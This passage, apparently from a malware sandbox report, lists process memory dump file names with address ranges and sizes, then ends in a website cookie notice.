                                                                                                                                                                                                                                                                  6.4MB

                                                                                                                                                                                                                                                                • memory/5660-992-0x00000208D0110000-0x00000208D3944000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  56.2MB

                                                                                                                                                                                                                                                                • memory/5660-1002-0x00000208EE020000-0x00000208EE02C000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  48KB

                                                                                                                                                                                                                                                                • memory/5660-1000-0x00000208EE1D0000-0x00000208EE2DA000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  1.0MB

                                                                                                                                                                                                                                                                • memory/5660-1001-0x00000208EE000000-0x00000208EE010000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                We care about your privacy.

                                                                                                                                                                                                                                                                This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.